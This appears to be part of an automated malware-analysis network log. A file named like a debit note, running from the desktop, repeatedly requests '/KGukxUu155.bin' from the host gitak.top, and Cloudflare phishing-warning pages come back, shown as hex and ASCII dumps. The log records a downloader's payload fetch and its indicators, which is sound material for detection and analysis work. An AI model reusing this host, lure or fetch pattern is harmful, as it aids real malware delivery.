                              2024-08-26 13:33:06 UTC1369INData Raw: 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 72 61 65 37 59 6a 71 58 76 4e 50 37 73 45 71 6a 34 41 72 38 4d 63 61 6d 66 56 59 46 32 6c 44 5a 37 73 43 6c 47 69 4c 79 44 32 55 2d 31 37 32 34 36 37 39 31 38 36 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79
                              Data Ascii: <input type="hidden" name="atok" value="rae7YjqXvNP7sEqj4Ar8McamfVYF2lDZ7sClGiLyD2U-1724679186-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" sty
                              2024-08-26 13:33:06 UTC850INData Raw: 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f
                              Data Ascii: sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</
                              2024-08-26 13:33:06 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              6192.168.11.2049823172.67.207.2194435076C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
                              TimestampBytes transferredDirectionData
                              2024-08-26 13:33:16 UTC168OUTGET /KGukxUu155.bin HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: gitak.top
                              Cache-Control: no-cache
                              2024-08-26 13:33:17 UTC541INHTTP/1.1 200 OK
                              Date: Mon, 26 Aug 2024 13:33:17 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              X-Frame-Options: SAMEORIGIN
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kTuzDTCZVspT%2FJe%2FGLDS3gRBsAzfrL5KGTP82ZqwDjhZDlZn73tLkeYzO7Y3dLi%2BkyrCnnDDt46fnjXw23gxo6eQU87UZ%2BTYDCpveOepdOf71vSMmmTF0WqaBmA%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b9431555cd40678-IAD
                              2024-08-26 13:33:17 UTC828INData Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                              Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                              2024-08-26 13:33:17 UTC1369INData Raw: 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 27 29
                              Data Ascii: ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert')
                              2024-08-26 13:33:17 UTC1369INData Raw: 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 38 6c 79 4e 68 72 71 4d 37 45 76 61 77 71 30 49 65 30 4f 7a 50 75 5f 67 6a 74 4f 74 39 78 4d 72 4e 35 42 35 6d 74 71 6f 4c 63 38 2d 31 37 32 34 36 37 39 31 39 37 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73
                              Data Ascii: <input type="hidden" name="atok" value="8lyNhrqM7Evawq0Ie0OzPu_gjtOt9xMrN5B5mtqoLc8-1724679197-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" s
                              2024-08-26 13:33:17 UTC852INData Raw: 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65
                              Data Ascii: r sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare
                              2024-08-26 13:33:17 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              7192.168.11.2049824172.67.207.2194435076C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
                              TimestampBytes transferredDirectionData
                              2024-08-26 13:33:27 UTC168OUTGET /KGukxUu155.bin HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: gitak.top
                              Cache-Control: no-cache
                              2024-08-26 13:33:27 UTC543INHTTP/1.1 200 OK
                              Date: Mon, 26 Aug 2024 13:33:27 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              X-Frame-Options: SAMEORIGIN
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wn1EqNPAU5KPLnFtD2V9rFjjN%2FuUR5WpVPcTkvOufDd2mH03vlvsg5ucW5Lq7Ccf%2B%2F4%2B5T9IEULZdFPfgPHrqm1WAhr4vYlNc8jZjVfZR2BpAg9KzV%2FTFvm6ibg%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b94319738c53897-IAD
                              2024-08-26 13:33:27 UTC826INData Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                              Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                              2024-08-26 13:33:27 UTC1369INData Raw: 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74
                              Data Ascii: s.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert
                              2024-08-26 13:33:27 UTC1369INData Raw: 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 57 79 50 37 38 6e 34 6c 5a 62 49 49 61 45 6d 46 6b 71 74 6d 75 74 75 79 43 71 45 4f 42 66 36 45 39 49 46 41 56 44 38 6e 78 6f 59 2d 31 37 32 34 36 37 39 32 30 37 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22
                              Data Ascii: <input type="hidden" name="atok" value="WyP78n4lZbIIaEmFkqtmutuyCqEOBf6E9IFAVD8nxoY-1724679207-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn"
                              2024-08-26 13:33:27 UTC854INData Raw: 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61
                              Data Ascii: tor sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudfla
                              2024-08-26 13:33:27 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              8192.168.11.2049825172.67.207.2194435076C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
                              TimestampBytes transferredDirectionData
                              2024-08-26 13:33:37 UTC168OUTGET /KGukxUu155.bin HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: gitak.top
                              Cache-Control: no-cache
                              2024-08-26 13:33:38 UTC537INHTTP/1.1 200 OK
                              Date: Mon, 26 Aug 2024 13:33:38 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              X-Frame-Options: SAMEORIGIN
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ICXPpdxDEmIWQRt6Zh9W%2F30qgS3ru1eIDFfuyeYyBvZ6bfEBJ8JSma65lF59TeaqSWJJSlMLFmWEM4Xcc4szob9xqQsM0ikn8TzISf%2FAtfTr2mSHwNODbWU7S00%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b9431d90bd63b92-IAD
                              2024-08-26 13:33:38 UTC832INData Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                              Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                              2024-08-26 13:33:38 UTC1369INData Raw: 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 27 29 3b 0a 20 20
                              Data Ascii: ss" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert');
                              2024-08-26 13:33:38 UTC1369INData Raw: 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 56 6c 48 56 6b 72 30 49 35 4c 57 32 56 70 6a 5f 76 65 2e 4b 6a 52 46 64 5a 6a 45 63 70 5f 6f 47 65 4d 31 4e 5f 42 4b 6b 74 30 77 2d 31 37 32 34 36 37 39 32 31 38 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65
                              Data Ascii: nput type="hidden" name="atok" value="VlHVkr0I5LW2Vpj_ve.KjRFdZjEcp_oGeM1N_BKkt0w-1724679218-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style
                              2024-08-26 13:33:38 UTC848INData Raw: 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 61 3e
                              Data Ascii: :hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a>
                              2024-08-26 13:33:38 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              9192.168.11.2049826172.67.207.2194435076C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
                              TimestampBytes transferredDirectionData
                              2024-08-26 13:33:48 UTC168OUTGET /KGukxUu155.bin HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: gitak.top
                              Cache-Control: no-cache
                              2024-08-26 13:33:48 UTC537INHTTP/1.1 200 OK
                              Date: Mon, 26 Aug 2024 13:33:48 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              X-Frame-Options: SAMEORIGIN
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nXlXM2vFo3Rr8EtU%2FG9YyQ%2Bl54WHFA3ZniT7DHDZHeOYZrQEIZf9QzKOSa11Kyg18G45s09pLrZ7ufd1cg0siKZDZ88TOIxSYokO5Ai9esmsHMj76uOeM0Td6OI%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b94321ad804200c-IAD
                              2024-08-26 13:33:48 UTC832INData Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                              Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                              2024-08-26 13:33:48 UTC1369INData Raw: 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 27 29 3b 0a 20 20
                              Data Ascii: ss" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert');
